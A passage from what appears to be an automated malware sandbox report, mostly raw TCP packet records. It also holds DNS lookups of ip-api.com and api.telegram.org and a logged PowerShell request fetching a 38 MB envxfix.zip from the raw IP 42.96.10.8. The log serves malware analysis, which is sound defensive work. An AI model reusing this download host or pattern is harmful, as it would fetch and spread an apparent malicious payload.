                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401104927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401112080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401132107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401134014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401134014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401139975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401149988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401158094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401165962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401175022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401180029 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401180029 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401187897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401192904 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401199102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401212931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401222944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401226044 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401231050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401238918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401248932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401257038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401266098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401269913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401271105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401271105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401278973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401289940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401299953 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401299953 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401335001 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401335001 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401789904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401798964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401807070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401854992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401863098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401870966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401879072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401901960 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401901960 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401967049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401976109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401983976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401993036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402013063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402019024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402087927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402090073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402090073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402096033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402102947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402110100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402115107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402123928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402134895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402148008 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402148008 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402194977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402198076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402206898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402215004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402223110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402230978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402235031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402256966 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402256966 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402257919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402266026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402273893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402282953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402302027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402328968 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402342081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402427912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402436972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402445078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402452946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402462006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402472019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402476072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402477980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402477980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402481079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402491093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402499914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402508974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402528048 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402528048 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402579069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402586937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402595043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402602911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402612925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402621984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402626038 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402626038 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402631998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402640104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402650118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402654886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402654886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402721882 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402720928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402734041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402741909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402750015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402757883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402766943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402775049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402785063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402793884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402806997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402806997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.402808905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403002977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403011084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403017998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403024912 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403024912 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403027058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403036118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403044939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403053045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403062105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403070927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403079987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403079987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403079987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403096914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403105021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403111935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403117895 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403117895 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403120995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403170109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403177977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403187037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403193951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403193951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403196096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403206110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403214931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403223038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403240919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403240919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403276920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403285027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403292894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403301001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403311014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403326035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403326035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403326035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403340101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403341055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403348923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403381109 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403493881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403501987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403522015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403527021 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403531075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403537989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403546095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403554916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403563976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403575897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403575897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403578043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403585911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403594017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403603077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403609991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403614998 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403614998 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403618097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403625965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403635979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403642893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403657913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403657913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403662920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403693914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403728962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403851986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403861046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403868914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403876066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.403886080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                            Nov 13, 2024 13:27:02.968399048 CET192.168.2.41.1.1.10xf9caStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:02.968524933 CET192.168.2.41.1.1.10x8e4eStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:11.065041065 CET192.168.2.41.1.1.10x2a85Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:11.065181017 CET192.168.2.41.1.1.10xd0e6Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:11.899717093 CET192.168.2.41.1.1.10xe62Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:12.877422094 CET192.168.2.41.1.1.10xe3b9Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:14.338653088 CET192.168.2.41.1.1.10x479eStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:14.338737011 CET192.168.2.41.1.1.10x3e6bStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:14.338936090 CET192.168.2.41.1.1.10xde3Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:14.339018106 CET192.168.2.41.1.1.10xba74Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:14.618443966 CET192.168.2.41.1.1.10x861aStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:14.618731976 CET192.168.2.41.1.1.10xaffStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:17.554025888 CET192.168.2.41.1.1.10xe09bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:17.554322004 CET192.168.2.41.1.1.10x1f06Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:22.063076973 CET192.168.2.41.1.1.10x85e2Standard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:22.063076973 CET192.168.2.41.1.1.10xf889Standard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:23.964114904 CET192.168.2.41.1.1.10x9f86Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:23.964114904 CET192.168.2.41.1.1.10x6fe0Standard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:28.533544064 CET192.168.2.41.1.1.10xf023Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:28.533647060 CET192.168.2.41.1.1.10xd8eaStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                            Nov 13, 2024 13:27:03.173491955 CET1.1.1.1192.168.2.40xf9caNo error (0)www.google.com142.250.184.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:03.173516035 CET1.1.1.1192.168.2.40x8e4eNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:11.072130919 CET1.1.1.1192.168.2.40xd0e6No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:11.072149038 CET1.1.1.1192.168.2.40x2a85No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:11.907233953 CET1.1.1.1192.168.2.40xe62No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:12.884321928 CET1.1.1.1192.168.2.40xe3b9No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:14.345581055 CET1.1.1.1192.168.2.40x3e6bNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:14.345812082 CET1.1.1.1192.168.2.40xde3No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:14.345812082 CET1.1.1.1192.168.2.40xde3No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:14.345860958 CET1.1.1.1192.168.2.40xba74No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:14.346745968 CET1.1.1.1192.168.2.40x479eNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:14.346745968 CET1.1.1.1192.168.2.40x479eNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:14.627537012 CET1.1.1.1192.168.2.40x861aNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:14.627537012 CET1.1.1.1192.168.2.40x861aNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:14.627690077 CET1.1.1.1192.168.2.40xaffNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:17.560830116 CET1.1.1.1192.168.2.40xe09bNo error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:17.561359882 CET1.1.1.1192.168.2.40x1f06No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:22.070374012 CET1.1.1.1192.168.2.40xf889No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:22.070389032 CET1.1.1.1192.168.2.40x85e2No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:22.070389032 CET1.1.1.1192.168.2.40x85e2No error (0)plus.l.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:23.971389055 CET1.1.1.1192.168.2.40x9f86No error (0)play.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:28.540610075 CET1.1.1.1192.168.2.40xd8eaNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 13, 2024 13:27:28.540627956 CET1.1.1.1192.168.2.40xf023No error (0)www.google.com142.250.185.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            0192.168.2.44973342.96.10.8807780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 13, 2024 13:25:14.431236982 CET71OUTGET /envxfix.zip HTTP/1.1
                                                                                                                                                                                                            Host: 42.96.10.8
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.446592093 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Nov 2024 12:25:15 GMT
                                                                                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                            Last-Modified: Fri, 01 Nov 2024 14:08:46 GMT
                                                                                                                                                                                                            ETag: "249c38d-625da7934817e"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Content-Length: 38388621
                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/zip
